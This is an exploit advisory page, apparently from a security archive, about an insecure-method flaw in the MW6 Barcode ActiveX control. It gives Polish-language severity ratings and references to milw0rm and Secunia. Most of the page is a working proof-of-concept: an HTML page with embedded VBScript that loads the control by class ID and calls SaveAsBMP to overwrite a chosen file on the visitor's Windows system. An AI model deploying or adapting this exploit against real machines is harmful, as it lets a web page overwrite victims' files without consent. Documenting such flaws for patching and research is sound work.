MW6 Barcode ActiveX (Barcode.dll) Insecure Method Exploit

2008-11-06 / 2008-11-07
Credit: Dr.Pantagon
Risk: High
Local: No
Remote: Yes


Ogólna skala CVSS: 9/10
Znaczenie: 10/10
Łatwość wykorzystania: 8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Jednorazowa
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

&#239;&#187;&#191;<!-- By Dr.Pantagon DeltaSecurityCenter www.DeltaSecurity.ir Description : 1D Barcode ActiveX ver : 3.0.0.1 CopyRight : MW6 Technologies, Inc. Download Link : http://www.mw6tech.com/barcode/try/MW6Barcode.zip This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6 This control contains two methods SaveAsBMP(); And SaveAsWMF(); Sub SaveAsWMF ( ByVal FileName As String ) AND Sub SaveAsWMF ( ByVal FileName As String ) you can see this problem to all product this company --> <html> <object classid='clsid:14D09688-CFA7-11D5-995A-005004CE563B' id='target' > <param name="BackColor" value="16777215"> <param name="BarHeight" value="1,5"> <param name="BarColor" value="0"> <param name="BorderStyle" value="0"> <param name="CheckDigit" value="0"> <param name="CheckDigitToText" value="0"> <param name="CodaBarStartChar" value="65"> <param name="CodaBarStopChar" value="66"> <param name="Data" value="1234"> <param name="NarrowBarWidth" value="0,07"> <param name="Orientation" value="0"> <param name="ShowText" value="1"> <param name="Supplement" value=""> <param name="SupplementGap" value="0,5"> <param name="SupplementType" value="0"> <param name="SymbologyType" value="2"> <param name="UPCESystem" value="0"> <param name="Wide2NarrowRatio" value="2"> <param name="FontName" value="Arial"> <param name="FontItalic" value="0"> <param name="FontStrikeOut" value="0"> <param name="FontUnderline" value="0"> <param name="FontWeight" value="400"> <param name="FontHeight" value="24"> </object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\Barcode.dll" prototype = "Sub SaveAsBMP ( ByVal FileName As String )" memberName = "SaveAsBMP" progid = "BARCODELib.MW6Barcode" argCount = 1 arg1="c:\windows\system_.ini" target.SaveAsBMP arg1 'target.SaveAsWMF arg1 </script>

Referencje:

http://www.milw0rm.com/exploits/6871
http://secunia.com/advisories/32425


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top